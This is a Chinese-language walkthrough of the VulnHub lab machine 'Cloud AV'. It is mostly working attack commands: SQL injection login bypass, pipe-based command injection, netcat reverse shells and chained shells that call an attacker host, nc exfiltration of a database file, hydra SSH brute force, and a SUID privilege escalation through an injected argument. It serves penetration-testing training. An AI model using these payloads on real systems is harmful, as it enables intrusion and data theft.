靶机地址:
https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
内容简介:
在这次打靶过程中,我们将使用到以下攻击手段:
端口扫描
WEB侦查
SQL注入
命令注入
密码爆破
代码审计
NC串联
本地提权
主机发现 arping 的使用
for i in $(seq 1 254); do sudo arping -c 2 10.0.0.$i; done
密码注入语句
select * from code where password="; + password + ";
select * from code where password="; + " or 1=1--+ + ";
" or 1=1-- 登录成功,+换成空格。后面有个空格
命令执行
猜测:
输入hello,执行 "avscan hello"
利用管道符拼接命令
avscan hello | id
查找一下nc
hello | which nc
kali 监听
nc -nvlp
弹shell
nc 192.168.111.128 4444 -e /bin/bash
-e : 可以弹出一个终端
发现连接不成功,原因:有的linux发行版中 nc 没有-e的参数
弹shell,基本连接
nc 192.168.111.128 4444
可以成功
nc技巧之nc的串连
nc 192.168.111.128 3333 | /bin/bash | nc 192.168.111.128 4444
nc技巧之文件传输
攻击机
nc -nvlp 5555 > db.sql
靶机
nc 192.168.111.128 5555 < database.sql
打开sqlite
sqlite3
打开db.sql文件
sqlite>.open db.sql
查看db.sql文件
sqlite>.database
下载db.sql文件
sqlite>.dump
在etc/passwd下查找具有ssh登录的账号
cat /etc/passwd | grep /bin/bash
通过dump下来的密码和passwd文件里找到的用户名做一个密码字典进行爆破
用hydra进行爆破
hydra -L user.txt -P pass.txt ssh://10.0.0.1
(没有成功)
进行提权
查找有S权限的文件(update_cloudav.c)
执行update_cloudav.c文件
.update_cloudav "a| nc 10.0.2.7 5555 | /bin/bash | nc 10.0.2.7 6666"
带""为了使update_cloudav认为""内为一个参数
提权成功!!!